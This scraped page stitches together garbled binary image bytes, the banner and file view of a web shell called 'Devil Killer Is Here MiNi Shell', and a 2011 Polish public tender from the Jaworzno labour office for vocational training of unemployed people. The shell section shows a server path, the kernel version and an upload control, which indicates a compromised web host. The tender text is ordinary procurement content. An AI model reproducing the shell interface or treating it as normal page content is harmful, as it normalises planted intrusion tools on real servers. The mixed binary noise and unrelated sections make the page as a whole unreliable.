JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110414/78566-N-2011.html

<p class="kh_header"><b>Jaworzno: usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych  szkoleń  osób bezrobotnych w  ramach Projektu Teraz My - Młodzi współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki- Poddziałanie 7.2.1</b><br>
<b>Numer ogłoszenia: 78566 - 2011; data zamieszczenia: 14.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupjaworzno.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych  szkoleń  osób bezrobotnych w  ramach Projektu Teraz My - Młodzi współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki- Poddziałanie 7.2.1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych w następująch zakresach:
I.  Zakres Pracownik ds. kadrowo-płacowych, Ilość osób: 5 osób w jednej edycji.
Czas realizacji: nie dłużej niż 9 tygodni.  
Program szkolenia: minimalna ilość godzin - 230, w tym minimum 180 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy, z zakresu: księgowy ds. płac i rozliczeń
z ZUS (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) wynagrodzenie za pracę - minimum 26 godzin; 
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 27 godzin; 
3) rozliczenie składek ZUS - minimum 22 godziny; 
4) zasiłki z ubezpieczenia społecznego - minimum 30 godziny; 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum 18 godzin; 
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy- minimum 33 godziny.
3.   jednostkę modułową: obsługa programu PŁATNIK- minimum 22 godziny,
4.   jednostkę modułową: obsługa programu SYMFONIA - minimum 22 godziny,
5.   jednostkę modułową: obsługa komputera, w tym edytor tekstu i arkusz kalkulacyjny - minimum 30 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia oraz kodeks pracy. 

II.  Zakres Przedstawiciel handlowy z prawem jazdy kat. B
Ilość osób: 5 osób w jednej edycji.
Czas realizacji: nie dłużej niż 8 tygodni.  
Program szkolenia:  minimalna ilość godzin - 150, w tym minimum 90 godzin ćwiczeń. 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: przedstawiciel handlowy (kod zawodu: 341503) 
z następującymi jednostkami modułowymi:
	1) kształtowanie wizerunku akwizytora - minimum 20 godzin, 
	2) przeprowadzanie analizy rynku i wybór docelowych segmentów rynku - minimum 25 godzin,
	3) prowadzenie sprzedaży akwizycyjnej - minumum 30 godzin,
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2. jednostkę modułową: prawo jazdy kat. B - minimum 60 godzin. 
3. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych - minimum 15 godzin. 
Program szkolenia musi być zgodny z obowiązującymi przepisami prawa tj. ustawą z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (tekst jednolity: Dz. U. z 2005r. Nr 108 poz. 908 z późn. zm.) oraz  rozporządzeniem  Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami,  instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z późn. zm.).
Dodatkowe wymagania: Uczestnik szkolenia otrzyma zaświadczenie zgodnie z ww. rozporządzeniem. Wykonawca dokona opłaty za pierwszy egzamin państwowy przeprowadzony w Wojewódzkim Ośrodku Ruchu Drogowego. 

III.  Zakres Spawacz spoin pachwinowych blach i rur w metodzie MAG
Ilość osób: 5 osób w jednej edycji. 
Czas realizacji: nie dłużej niż 8 tygodni.  
Program szkolenia: minimalna ilośc godzin - 145 godzin, w tym minimum 120 godzin ćwiczeń.
Program szkolenia powinien zostać opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa w Gliwicach.

IV.  Zakres Operator koparko - ładowarki wszystkie typy klasa III
Ilość osób: 5 osób w jednej edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin szkolenia - 202 godziny. Szkolenie powinno  być zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać świadectwo oraz uzyskać wpis do książki operatora wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.

V.  Zakres Obsługa biurowa przedsiębiorstwa z zastosowaniem komputera i kasy fiskalnej
Ilość osób: 5 osób w jednej edycji.
Czas realizacji: nie dłużej niż 6 tygodni.  
Program szkolenia: minimalna ilość godzin szkolenia - 150 godzin, w tym minimum 70 godzin ćwiczeń. 
Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: pracownik administracyjny (kod zawodu: 343401) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać następujące jednostki modułowe: 
1) organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy oraz ochrony  przeciwpożarowej i ochrony środowiska  i zarzadzanie w jednoste organizacyjnej,
2) organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz doskonalenie osobistych kompetencji,
3) organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac związanych z funkcjonowaniem przedsiębiorstwa,
4) przyjmowanie i obsługiwanie interesantów,
5) wykonywanie prac admninistracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6) zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7) sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej z działalnością jednostki organizacyjnej zgodnie z przyjętym systemem kancelaryjnym,
8) przygotowanie i udostępnianie dokumentacji do kontroli,
9) redagowanie korespondencji biurowej w języku polskim,
10) sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz finansowej związanej z działalnością jednostki gospodarczej,
11) przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,

12) gromadzernie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika administracyjnego,
13) tworzenie i prowadzenie bazy danych kontrahentów,
14) stosowanie przepisów prawa w pracy zawodowej,
15) wykonywanie prac biurowych,
16) współpraca z innymi komórkami organizacyjnymi jednostki,
17) współpraca z otoczeniem zewnętrznym jednostki organizacyjnej ,
18) kierowanie zespołem pracowników administracyjno-biurowych,
19) ocenianie jakości i efektywności własnych działań zawodowych,
20) obsługa urządzeń biurowych,
21) obsługa komputera (edytor tekstu, arkusz kalkulacyjny, system obsługi baz danych, program do prezentacji multimedialnych, poczta elektroniczna, obsługa Internetu) - minimum 30 godzin, 
22) obsługa kasy fiskalnej - minimum 10 godzin. 
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia.

VI.  Zakres Obsługa biura rachunkowego z elementami księgowości
Ilość osób: 5 osób w I grupie.
Czas realizacji: nie dłużej niż 9 tygodni.  
Program szkolenia: minimalna ilość godzin szkolenia -  230 godzin, w tym minimum 160 godzin ćwiczeń. 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy, z zakresu: księgowy ds. rachuby płac (kod zawodu: 343201) z następującymi jednostkami modułowymi:
1) ogólne zasady rachunkowości - minimum 10 godzin, 
2) ewidencja operacji gospodarczych - minimum 5 godzin, 
3) organizacja rachunkowości w jednostkach gospodarczych - minimum 5 godzin, 
4) sporządzanie list płac i rozdzielników - minimum 10 godzin, 
5) sporzadzanie list zasiłków i deklaracji ZUS - minimum 10 godzin, 
6) rozliczanie podatku dochodowego od osób fizycznych - minimum 10 godzin, 
7) ewidencja rozrachunków z pracownikami - minimum 5 godzin, 
8) ewidencja rozrachunków publiczno - prawnych - minimum 10 godzin, 
9) ewidencja pozostalych rozrachunków - minimum 5 godzin, 
2. modułowy program szkolenia zawodowego dla zawodu: specjalista do spraw rachunkowości, z zakresu: sporządzanie i analiza bilansu, przygotowywanie sprawozdań finansowych (kod zawodu: 241205) 
z następującymi jednostkami modułowymi: 
1) sporządzanie i analiza bilansu - minimum 30 godzin;
2) sporządzanie i analiza rachunku zysków i strat - minimum 20 godzin;
3) sporządzanie rachunku przepływów pieniężnych - minimum 15 godzin;
4) zestawienie zmian w kapitale (funduszu) własnym - minimum 15 godzin;
5) dodatkowe informacje i objaśnienia sprawozdań finansowych - minimum 5 godzin;
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
3.  jednostkę modułową: zagadnienia związane z prawem pracy- minimum 5 godzin,
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 20 godzin,
5.   jednostkę modułową: obsługa programu SYMFONIA - minimum 20 godzin,
6.   jednostkę modułową: obsługa komputera, w tym edytor tekstu i arkusz kalkulacyjny - minimum 30 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia oraz kodeks pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny:
1) wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /Dz. U. Nr 236 poz. 2365/.
2) wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców - zgodnie z art. 103 ustawy z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (tekst jednolity: Dz. U. z 2005r. Nr 108 poz. 908 z późn. zm.) - dotyczy wyłącznie zakresu II. 
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia/oświadczeń, o których mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej trzy usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia.  
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 Pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1) wykładowcy prowadzący zajęcia muszą posiadać wykształcenie wyższe związane z kierunkiem szkolenia lub wykształcenie wyższe oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem;
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej wykształcenie średnie związane z kierunkiem szkolenia lub wykształcenie średnie oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem;
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć zgodnych z kierunkiem szkolenia;
4) każda z osób prowadzących zajęcia musi posiadać uprawnienia pedagogiczne lub co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Prawo zamówień publicznych - (załącznik nr 5 do SIWZ.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.7</li>
<li>2 - doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia - 0.2</li>
<li>3 - posiadanie certyfikatu jakości usług - 0.1</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób wskazanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach.  Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio
lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przemiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu realizacji szkolenia. 
W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia.
W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca szkolenia o co najmniej porównywalnych warunkach. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. np. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie kolejnego naboru, Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupjaworzno.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
